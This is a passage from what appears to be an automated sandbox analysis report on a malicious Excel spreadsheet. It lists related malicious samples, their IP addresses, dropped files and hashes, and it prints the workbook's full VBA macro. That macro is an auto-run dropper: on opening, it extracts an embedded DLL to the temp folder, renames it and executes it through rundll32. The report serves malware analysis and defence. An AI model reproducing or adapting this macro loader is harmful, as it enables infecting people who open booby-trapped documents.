                                              • 54.225.245.108
                                              U6i3o7E68j.exeGet hashmaliciousBrowse
                                              • 50.16.238.218
                                              9QFzJlxaTl.dllGet hashmaliciousBrowse
                                              • 50.19.92.227
                                              ovLjmo5UoEGet hashmaliciousBrowse
                                              • 54.61.128.52
                                              o3ZUDIEL1vGet hashmaliciousBrowse
                                              • 54.140.119.74
                                              D1dU3jQ1IIGet hashmaliciousBrowse
                                              • 34.207.187.69
                                              wREFu91LXZ.exeGet hashmaliciousBrowse
                                              • 52.5.43.61
                                              br8oLpYtwO.exeGet hashmaliciousBrowse
                                              • 54.237.66.139
                                              uiza7XkNGQPRQvb.exeGet hashmaliciousBrowse
                                              • 3.223.115.185
                                              A7X93JRxhpGet hashmaliciousBrowse
                                              • 54.146.206.59
                                              8ZJ0cPowTyGet hashmaliciousBrowse
                                              • 54.29.51.121
                                              XuQRPW44hiGet hashmaliciousBrowse
                                              • 52.44.113.28
                                              5qpsqg7U0GGet hashmaliciousBrowse
                                              • 54.0.244.90
                                              Remittance.htmlGet hashmaliciousBrowse
                                              • 50.16.239.65
                                              ZlvFNj.dllGet hashmaliciousBrowse
                                              • 3.223.192.20
                                              bPAMfuy9oaGet hashmaliciousBrowse
                                              • 107.23.89.187
                                              U4r9W64doyGet hashmaliciousBrowse
                                              • 54.61.104.90
                                              C4PozjQdGEGet hashmaliciousBrowse
                                              • 54.131.116.216
                                              kb5IbEJU8cGet hashmaliciousBrowse
                                              • 54.2.185.151
                                              AMAZON-AESUS532.dllGet hashmaliciousBrowse
                                              • 54.225.245.108
                                              0722_5065418752.xlsGet hashmaliciousBrowse
                                              • 54.225.245.108
                                              U6i3o7E68j.exeGet hashmaliciousBrowse
                                              • 50.16.238.218
                                              9QFzJlxaTl.dllGet hashmaliciousBrowse
                                              • 50.19.92.227
                                              ovLjmo5UoEGet hashmaliciousBrowse
                                              • 54.61.128.52
                                              o3ZUDIEL1vGet hashmaliciousBrowse
                                              • 54.140.119.74
                                              D1dU3jQ1IIGet hashmaliciousBrowse
                                              • 34.207.187.69
                                              wREFu91LXZ.exeGet hashmaliciousBrowse
                                              • 52.5.43.61
                                              br8oLpYtwO.exeGet hashmaliciousBrowse
                                              • 54.237.66.139
                                              uiza7XkNGQPRQvb.exeGet hashmaliciousBrowse
                                              • 3.223.115.185
                                              A7X93JRxhpGet hashmaliciousBrowse
                                              • 54.146.206.59
                                              8ZJ0cPowTyGet hashmaliciousBrowse
                                              • 54.29.51.121
                                              XuQRPW44hiGet hashmaliciousBrowse
                                              • 52.44.113.28
                                              5qpsqg7U0GGet hashmaliciousBrowse
                                              • 54.0.244.90
                                              Remittance.htmlGet hashmaliciousBrowse
                                              • 50.16.239.65
                                              ZlvFNj.dllGet hashmaliciousBrowse
                                              • 3.223.192.20
                                              bPAMfuy9oaGet hashmaliciousBrowse
                                              • 107.23.89.187
                                              U4r9W64doyGet hashmaliciousBrowse
                                              • 54.61.104.90
                                              C4PozjQdGEGet hashmaliciousBrowse
                                              • 54.131.116.216
                                              kb5IbEJU8cGet hashmaliciousBrowse
                                              • 54.2.185.151
                                              CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC532.dllGet hashmaliciousBrowse
                                              • 8.211.241.0
                                              0722_5065418752.xlsGet hashmaliciousBrowse
                                              • 8.211.241.0
                                              pax. 415-12.07.2021.jsGet hashmaliciousBrowse
                                              • 47.254.174.190
                                              P58w6OezJY.exeGet hashmaliciousBrowse
                                              • 8.208.92.235
                                              rxfttQnoO5Get hashmaliciousBrowse
                                              • 47.75.21.31
                                              TFG18FA4eDGet hashmaliciousBrowse
                                              • 8.213.213.241
                                              Filmora-Wondershare-Installer.exeGet hashmaliciousBrowse
                                              • 47.91.67.36
                                              ViJoy.exeGet hashmaliciousBrowse
                                              • 47.91.67.36
                                              wy2BysBF1UGet hashmaliciousBrowse
                                              • 47.91.26.153
                                              leyw73RE9oGet hashmaliciousBrowse
                                              • 47.252.147.45
                                              NzQGtyZFe8Get hashmaliciousBrowse
                                              • 47.255.177.113
                                              XfKsLIPLUuGet hashmaliciousBrowse
                                              • 8.211.161.2
                                              AT9n7Bk0yEGet hashmaliciousBrowse
                                              • 47.251.12.169
                                              jvD4W5Csk1.exeGet hashmaliciousBrowse
                                              • 8.209.69.242
                                              Cc8M6hqDMe.exeGet hashmaliciousBrowse
                                              • 47.254.175.174
                                              e19e0e7f8871e7acf07a37b277b5aaf2aa125f28ee116.exeGet hashmaliciousBrowse
                                              • 8.209.64.72
                                              18ccb7df2f91787a9392bf60d2f7019c86af65584c8a9.exeGet hashmaliciousBrowse
                                              • 8.209.64.72
                                              xBMx9OBP97.exeGet hashmaliciousBrowse
                                              • 8.208.92.93
                                              CSyG3zNcwS.exeGet hashmaliciousBrowse
                                              • 8.208.92.93
                                              BrCi5pJr8J.exeGet hashmaliciousBrowse
                                              • 8.208.92.93

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              C:\Users\user\AppData\Local\Temp\532.dll0722_5065418752.xlsGet hashmaliciousBrowse

                                                Created / dropped Files

                                                C:\ProgramData\kaosdma.txt
                                                Process:C:\Windows\SysWOW64\svchost.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):10
                                                Entropy (8bit):2.6464393446710157
                                                Encrypted:false
                                                SSDEEP:3:HLLg:fg
                                                MD5:FA13251DCFFD9666C5F92DF673E69E62
                                                SHA1:6D6CB94CF09D537789A1D4CC3A85470F3510FC14
                                                SHA-256:70896E7D7D47410A6F025E85B8239C1CA68BD3DF5B0FFE7017F1743043E37E1E
                                                SHA-512:18FE6A5F7246C089C7719BE4D069EADE83E032E41DD7FB8F7A0C2AD2C371A712026A57606CD6220B0DDC52EB35C483074D2BC21431E658944BAC157DEEF191A6
                                                Malicious:false
                                                Reputation:low
                                                Preview: 84.17.52.8
                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\BKHVJ3NI.txt
                                                Process:C:\Windows\SysWOW64\svchost.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):10
                                                Entropy (8bit):2.6464393446710157
                                                Encrypted:false
                                                SSDEEP:3:HLLg:fg
                                                MD5:FA13251DCFFD9666C5F92DF673E69E62
                                                SHA1:6D6CB94CF09D537789A1D4CC3A85470F3510FC14
                                                SHA-256:70896E7D7D47410A6F025E85B8239C1CA68BD3DF5B0FFE7017F1743043E37E1E
                                                SHA-512:18FE6A5F7246C089C7719BE4D069EADE83E032E41DD7FB8F7A0C2AD2C371A712026A57606CD6220B0DDC52EB35C483074D2BC21431E658944BAC157DEEF191A6
                                                Malicious:false
                                                Reputation:low
                                                Preview: 84.17.52.8
                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3ECECA93.emf
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                Category:dropped
                                                Size (bytes):4976
                                                Entropy (8bit):3.879470172171999
                                                Encrypted:false
                                                SSDEEP:48:ptNZgsdBgD89t1Tb4HKKZX3Y6kpYjdHkYaP6:xZlBvt1X6YU5EH6
                                                MD5:C647941F85819463821807ED3BCA9A80
                                                SHA1:4A52009C351C9F08D67A235021CB9D618B3FB39F
                                                SHA-256:6BE153848165D1AB8A23EF5EB177D719A15CCA021937E3C28E5C88514D070910
                                                SHA-512:5AF1A4677BA2A36D2D087751C89F99A523D67C54524A64E6AB805E24CAAC6719EF617B3C9594CD8535E582A470FDA99DC63D4F26E7B5B89E6028DA2DCDE02EE9
                                                Malicious:false
                                                Reputation:low
                                                Preview: ....l...........-.../...........^....... EMF....p.......................V.......i......................:...........................3...5...R...p...................................S.e.g.o.e. .U.I.....................................................\.......................8..XD..........._..............0..XD...........................T.......X..XD...................a$7........XD....................$..............wg.........XD...X..X............8..XD...................0..XD...I..XD...X..XD.......dv......%...................................r...............)............... ... ..................?...........?................l...4........... ... ...(... ... ..... .............................................................................................................................................................................................................................................................................................................................................
                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4C91F519.emf
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                Category:dropped
                                                Size (bytes):4976
                                                Entropy (8bit):3.8552592590578634
                                                Encrypted:false
                                                SSDEEP:48:pWN5aFsdBgD89t1Tb4HKKZX3Y6kpnydHkGau:E5a0Bvt1X6Y+Ek
                                                MD5:4FEB2EE830D455756D2B803BC43B53E1
                                                SHA1:ED22FEB2E91F8CC3E5868450011B2E3F413A9F76
                                                SHA-256:BF3819F146CC5D4FB9ED888415DEE9A3BB043DF9CD0D1151D218BFC2D344A6CC
                                                SHA-512:F21D2B5AB048A1EF5D9D41986F60C1176DD2351C438B498A44AF65CCD69CE1F781EE3B8294FF44756A9E4B19B3F85D868598A68ACC82D1BBE6603A6654AC51DD
                                                Malicious:false
                                                Preview: ....l...........%.../...........p....... EMF....p.......................V.......i......................:...........................*...5...R...p...................................S.e.g.o.e. .U.I.....................................................\.......@'X2....(.,..............................xb....0(X2.....................'X2.............'X2....................a$........,............................. .,.......+...................................................0(X2....I(X2....X)X2........dv......%...................................r...............$............... ... ..................?...........?................l...4........... ... ...(... ... ..... .............................................................................................................................................................................................................................................................................................................................................
                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5D91DB78.emf
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                Category:dropped
                                                Size (bytes):4976
                                                Entropy (8bit):3.8697655321605633
                                                Encrypted:false
                                                SSDEEP:48:ptN3ZYDgsdBgD89t1Tb4HKKZX3Y6kpnydHkfaP6:xJ6lBvt1X6Y+Es6
                                                MD5:561ADBAB9E33ED0833A3CA3299DA356A
                                                SHA1:8F185A2A67D70606A57654F158A30EFD9CE33B3C
                                                SHA-256:275929AF7553B75A1355E0FD96B655DBBD56C81A890F06A5CB2B8882BF5F45B8
                                                SHA-512:9DABDDC451289F3FBBEE6173F9C9AA1724AC2324AE50D6FF43034C0E58373C9C40F82132DD472EA8C26176C60071E57B8C988E6A94FF7CF20306D87029448FA4
                                                Malicious:false
                                                Preview: ....l...........-.../...........^....... EMF....p.......................V.......i......................:...........................3...5...R...p...................................S.e.g.o.e. .U.I.....................................................\.......................p.l..........._................p.l...........................T.........p.l...................a$7.....@.p.l..................................wg...... .p.l.....p..............p.l....................p.l....p.l.....p.l.......dv......%...................................r...............)............... ... ..................?...........?................l...4........... ... ...(... ... ..... .............................................................................................................................................................................................................................................................................................................................................
                                                C:\Users\user\AppData\Local\Temp\532.dll
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):204800
                                                Entropy (8bit):6.327152340682224
                                                Encrypted:false
                                                SSDEEP:3072:HLg/uYnxzUzb9HbHYgaf8odt7DBsXFJktl/ML5xtREVFW5p3d+0d:HMZJUzBZaf84VE4l/ML5xEop3fd
                                                MD5:7348620F737EC1B0997CAE7548344F2C
                                                SHA1:5550F62FDC0963C331B460F8A967C45D481E505A
                                                SHA-256:8EFAC1531E83525BB0806EEBCA0BB9A797A18FEB1848A4CEEE4A88FDB85CBBBD
                                                SHA-512:568BABF18BA8AD33C9756E43610172361132F076BB4601E0E046317A30A298DA453219F43A2B5FFAFC5C535E4CA62FFFF622AE7BF084EFBA786946B880F9DDB6
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 2%
                                                Joe Sandbox View:
                                                • Filename: 0722_5065418752.xls, Detection: malicious, Browse
                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......`..A$...$...$....U..0....U.......U..C...-...-...$........U..%....U..%....U..%....U..%...Rich$...................PE..L...a.F...........!.........................................................`.....................................0...k...x...d.... .......................0..,...P...................................@............................................text....r.......................... ..`.rdata...,.......0..................@..@.data....^....... ..................@....rsrc........ ......................@..@.reloc...'...0...0..................@..B........................................................................................................................................................................................................................................................................................................................
                                                C:\Users\user\AppData\Local\Temp\532.dll:Zone.Identifier
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):26
                                                Entropy (8bit):3.95006375643621
                                                Encrypted:false
                                                SSDEEP:3:gAWY3n:qY3n
                                                MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                                                SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                                                SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                                                SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                                                Malicious:false
                                                Preview: [ZoneTransfer]..ZoneId=3..

                                                Static File Info

                                                General

                                                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Create Time/Date: Fri Jun 5 19:17:20 2015, Last Saved Time/Date: Thu Jul 22 11:32:50 2021, Security: 0
                                                Entropy (8bit):6.79339812364088
                                                TrID:
                                                • Microsoft Excel sheet (30009/1) 47.99%
                                                • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                File name:0722_2857746751.xls
                                                File size:351232
                                                MD5:97538e922b86b2ae95625d1e11e6aaf1
                                                SHA1:928e4d89b379bdd7c894787431a8d0b42f28a5a4
                                                SHA256:83c9c9beaca0a147e23995b84792f56cd130ccf262147374bd1114c2ac698fee
                                                SHA512:c002b9f11892fb3882ccb7b07e91a5396370232407614ea1f5b4b6dbf7cde70c59c699415e01066731454debfb8e468a15def21ef889b92dedeabde79a623ed7
                                                SSDEEP:6144:gMZJUzBZaf84VE4l/ML5xEop3fduk3hOdsylKlgxopeiBNhZF+E+W2kdAvvvvvv8:3AO84VE4l/MLzEglYfPEDvL3
                                                File Content Preview:........................>.......................................................................z..............................................................................................................................................................

                                                File Icon

                                                Icon Hash:e4eea286a4b4bcb4

                                                Static OLE Info

                                                General

                                                Document Type:OLE
                                                Number of OLE Files:1

                                                OLE File "0722_2857746751.xls"

                                                Indicators

                                                Has Summary Info:True
                                                Application Name:unknown
                                                Encrypted Document:False
                                                Contains Word Document Stream:False
                                                Contains Workbook/Book Stream:True
                                                Contains PowerPoint Document Stream:False
                                                Contains Visio Document Stream:False
                                                Contains ObjectPool Stream:
                                                Flash Objects Count:
                                                Contains VBA Macros:True

                                                Summary

                                                Code Page:1252
                                                Author:
                                                Last Saved By:
                                                Create Time:2015-06-05 18:17:20
                                                Last Saved Time:2021-07-22 10:32:50
                                                Security:0

                                                Document Summary

                                                Document Code Page:1252
                                                Thumbnail Scaling Desired:False
                                                Company:
                                                Contains Dirty Links:False
                                                Shared Document:False
                                                Changed Hyperlinks:False
                                                Application Version:1048576

                                                Streams with VBA

                                                VBA File Name: Module1.bas, Stream Size: 2081
                                                General
                                                Stream Path:_VBA_PROJECT_CUR/VBA/Module1
                                                VBA File Name:Module1.bas
                                                Stream Size:2081
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                Data Raw:01 16 03 00 06 f0 00 00 00 d2 03 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 00 04 00 00 d0 06 00 00 02 00 00 00 01 00 00 00 0d b9 0d 2d 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                VBA Code Keywords

                                                Keyword
                                                Nedc,
                                                String)
                                                nam(pafs
                                                mds.SubFolders
                                                Search(mds
                                                VB_Name
                                                ErrHandle:
                                                Ters.Name
                                                Err.Clear
                                                Object
                                                Environ$("temp")
                                                Search
                                                mds.Files
                                                "omsh.dll"
                                                Attribute
                                                Object,
                                                VBA Code
                                                Attribute VB_Name = "Module1"

Sub nam(pafs As String)
Name pafs As Environ$("temp") & "\" & "omsh.dll"
End Sub



 
 Sub Search(mds As Object, pafs As String)
 Dim Nedc As Object

  
   For Each Nedc In mds.SubFolders
     Search Nedc, pafs
   Next Nedc
Dim Ters As Object
   For Each Ters In mds.Files
   
   If Ters.Name = "532.dll" Then
       
        pafs = Ters
        End If
   Next Ters
   Exit Sub
ErrHandle:
   
   Err.Clear
End Sub
                                                VBA File Name: Sheet1.cls, Stream Size: 999
                                                General
                                                Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                VBA File Name:Sheet1.cls
                                                Stream Size:999
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . y . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                Data Raw:01 16 03 00 01 f0 00 00 00 da 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff e1 02 00 00 35 03 00 00 00 00 00 00 01 00 00 00 0d b9 d2 79 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                VBA Code Keywords

                                                Keyword
                                                False
                                                VB_Exposed
                                                Attribute
                                                VB_Name
                                                VB_Creatable
                                                VB_PredeclaredId
                                                VB_GlobalNameSpace
                                                VB_Base
                                                VB_Customizable
                                                VB_TemplateDerived
                                                VBA Code
                                                Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
                                                VBA File Name: ThisWorkbook.cls, Stream Size: 4517
                                                General
                                                Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                VBA File Name:ThisWorkbook.cls
                                                Stream Size:4517
                                                Data ASCII:. . . . . 0 . . . . . . . . . . . . . . . . . . . . . . . c . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . 0 . . . . . : . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e l l E x e c u t e A . . . . . . . . . . . . . x . . . . . r ) . . ~ . c A . . . . q | . p . . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . . S f . ( b L . J . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . S f . ( b L . J . . . . . 1 . . r )
                                                Data Raw:01 16 03 00 06 30 01 00 00 e2 08 00 00 14 01 00 00 c0 02 00 00 ad 09 00 00 bb 09 00 00 63 0e 00 00 01 00 00 00 01 00 00 00 0d b9 bd a7 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 30 00 00 00 00 00 3a 02 20 00 00 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 53 68 65 6c 6c 45 78 65 63 75 74 65 41 00 00 00 ff ff ff ff 01 00 00 00 ff ff 78 00 ff

                                                VBA Code Keywords

                                                Keyword
                                                Scripting.FileSystemObject
                                                String,
                                                ByVal
                                                "texmp"
                                                VB_Name
                                                VB_Creatable
                                                "ThisWorkbook"
                                                VB_Exposed
                                                nShowCmd
                                                FileSystemObject
                                                PtrSafe
                                                Selection.Copy
                                                "ShellExecuteA"
                                                Function
                                                (ByVal
                                                "\omsh.dll,SHIIJGLGNAB",
                                                Option
                                                Dir(vcbc
                                                nam(Ioes)
                                                Long)
                                                Environ$("temp")
                                                Long,
                                                VB_Customizable
                                                vbNullString,
                                                ActiveSheet.Shapes.Range(Array("Object
                                                ".exe"
                                                Explicit
                                                "rundl"
                                                xxx()
                                                Alias
                                                lpDirectory
                                                Ioes)
                                                VB_TemplateDerived
                                                Declare
                                                String
                                                Compare
                                                False
                                                lpFile
                                                Attribute
                                                lpParameters
                                                Workbook_Open()
                                                Private
                                                VB_PredeclaredId
                                                asdaf
                                                VB_GlobalNameSpace
                                                "\omsh.dll")
                                                VB_Base
                                                Search(asdaf.GetFolder(usx),
                                                lpOperation
                                                Len(Ioes)
                                                VBA Code
                                                Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Compare Text
Option Explicit
Dim Ioes As String
  Private Declare PtrSafe Function fffz Lib "shell32"         Alias "ShellExecuteA" (ByVal hwnd As Long,         ByVal lpOperation As String, ByVal lpFile As String,         ByVal lpParameters As String, ByVal lpDirectory As String,         ByVal nShowCmd As Long) As Long
Private Sub Workbook_Open()

  

Dim vcbc As String
vcbc = Environ$("temp")
Dim xc
xc = "texmp"
If Dir(vcbc & "\omsh.dll") = "" Then

ActiveSheet.Shapes.Range(Array("Object 20")).Select
Selection.Copy


Call xxx

If Len(Ioes) > 2 Then

Call nam(Ioes)

Dim ued As String
ued = ".exe"


 fffz 0, vbNullString,     "rundl" & "l32", Environ$("temp") & "\omsh.dll,SHIIJGLGNAB",      vbNullString, 1
End If
End If
End Sub


Sub xxx()
Dim usx

usx = Environ$("temp")


Dim asdaf As FileSystemObject

Set asdaf = New Scripting.FileSystemObject


Call Search(asdaf.GetFolder(usx), Ioes)

End Sub

                                                Streams

                                                Stream Path: \x1CompObj, File Type: data, Stream Size: 107
                                                General
                                                Stream Path:\x1CompObj
                                                File Type:data
                                                Stream Size:107
                                                Entropy:4.18482950044
                                                Base64 Encoded:True
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 1f 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
                                                General
                                                Stream Path:\x5DocumentSummaryInformation
                                                File Type:data
                                                Stream Size:244
                                                Entropy:2.65175227267
                                                Base64 Encoded:False
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 2 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
                                                Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
                                                Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 176
                                                General
                                                Stream Path:\x5SummaryInformation
                                                File Type:data
                                                Stream Size:176
                                                Entropy:2.70609321129
                                                Base64 Encoded:False
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . l . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . x s . . . . . @ . . . . 5 . . . ~ . . . . . . . . . .
                                                Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 80 00 00 00 06 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 0c 00 00 00 60 00 00 00 0d 00 00 00 6c 00 00 00 13 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                                Stream Path: MBD0132A5F4/\x1CompObj, File Type: data, Stream Size: 76
                                                General
                                                Stream Path:MBD0132A5F4/\x1CompObj
                                                File Type:data
                                                Stream Size:76
                                                Entropy:3.09344952647
                                                Base64 Encoded:False
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . O L E P a c k a g e . . . . . . . . . P a c k a g e . . 9 . q . . . . . . . . . . . .
                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 0c 00 03 00 00 00 00 00 c0 00 00 00 00 00 00 46 0c 00 00 00 4f 4c 45 20 50 61 63 6b 61 67 65 00 00 00 00 00 08 00 00 00 50 61 63 6b 61 67 65 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                Stream Path: MBD0132A5F4/\x1Ole10Native, File Type: data, Stream Size: 205073
                                                General
                                                Stream Path:MBD0132A5F4/\x1Ole10Native
                                                File Type:data
                                                Stream Size:205073
                                                Entropy:6.32670240332
                                                Base64 Encoded:True
                                                Data ASCII:. ! . . . . 5 3 2 . d l l . C : \\ U s e r s \\ M y P c \\ D e s k t o p \\ 2 1 3 \\ 5 3 2 . d l l . . . . . ) . . . C : \\ U s e r s \\ M y P c \\ A p p D a t a \\ L o c a l \\ T e m p \\ 5 3 2 . d l l . . . . M Z . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . L . ! T h i s p r o g r a m c a n n o t b e r u n i n D O S m o d e . . . . $ . . . . . . . ` . . A $ . . . $ . . . $ . . . . U . . 0 . . . . U .
                                                Data Raw:0d 21 03 00 02 00 35 33 32 2e 64 6c 6c 00 43 3a 5c 55 73 65 72 73 5c 4d 79 50 63 5c 44 65 73 6b 74 6f 70 5c 32 31 33 5c 35 33 32 2e 64 6c 6c 00 00 00 03 00 29 00 00 00 43 3a 5c 55 73 65 72 73 5c 4d 79 50 63 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 54 65 6d 70 5c 35 33 32 2e 64 6c 6c 00 00 20 03 00 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00
                                                Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 117790
                                                General
                                                Stream Path:Workbook
                                                File Type:Applesoft BASIC program data, first line number 16
                                                Stream Size:117790
                                                Entropy:7.68434203092
                                                Base64 Encoded:True
                                                Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . V e 1 8 . . . . . . . X . @
                                                Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
